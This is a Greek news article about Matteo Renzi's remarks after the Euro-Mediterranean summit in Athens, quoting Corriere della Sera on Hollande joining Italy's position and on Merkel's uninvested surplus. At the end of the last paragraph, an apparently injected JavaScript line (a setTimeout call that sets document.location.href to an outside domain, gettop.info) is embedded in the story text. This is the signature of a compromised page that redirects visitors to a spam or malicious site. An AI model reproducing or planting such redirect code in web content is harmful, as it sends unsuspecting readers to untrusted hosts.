Ματέο Ρέντσι: Τώρα είμαστε πολλοί και μπορούμε να ενοχλήσουμε

0
7

 

Περισσότερο από ικανοποιημένος ήταν ο Ιταλός πρωθυπουργός από την Σύνοδο των ευρωμεσογειακών χωρών στην Αθήνα.

«Επιτέλους ο Ολάντ είναι μαζί μας, ξεπέρασε την αναποφασιστικότητα. Τώρα είμαστε πολλοί, μπορούμε να κινητοποιηθούμε», δήλωσε ο Ματέο Ρέντσι, γράφει η εφημερίδα Corriere della Sera.

«Κατά την πτήση που τον μετέφερε στην Ρώμη από την Αθήνα, ο Ιταλός πρωθυπουργός ήταν κάτι περισσότερο από ικανοποιημένος», προσθέτει η εφημερίδα.

Ο Ρέντσι υπογράμμισε ότι επιτέλους το Παρίσι υπέγραψε μια διακήρυξη η οποία συμπίπτει με τις πολιτικές οι οποίες προωθούν η Ιταλία και οι άλλες πέντε χώρες που συναντήθηκαν στην Αθήνα.

Παράλληλα, συνομιλώντας με τους δημοσιογράφους, τόνισε: « Τώρα είμαστε πολλοί και μπορούμε να ενοχλήσουμε». Για τον λόγο αυτό, γράφει η εφημερίδα του Μιλάνου, είναι πεπεισμένος ότι «στο μέλλον, οι συσχετισμοί δυνάμεων πρόκειται να αλλάξουν».

Σε ότι αφορά την Γερμανία, δε, ο επικεφαλής της κυβέρνησης της Ρώμης αναφέρθηκε και στα προβλήματα του Βερολίνου: «Και η Μέρκελ, σπίτι της, έχει τα δικά της προβλήματα. Έχει ένα πλεόνασμα 80 με 90 δισεκατομμυρίων ευρώ, το οποίο δεν επενδύει, όπως προβλέπουν οι ευρωπαϊκοί κανόνες.

Είναι κάτι που θα έδινε ανάσα ανακούφισης στην οικονομία μας και όχι μόνον», πρόσθεσε ο Ιταλός κεντροαριστερός πρωθυπουργός, σύμφωνα με τον οποίο -αναφέρει η Corriere – «είναι λανθασμένο να μην σέβεται, κανείς, κάποιους κανόνες, και αμέσως μετά να είναι άκαμπτος με τους άλλους, σε ότι αφορά την ευελιξία». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here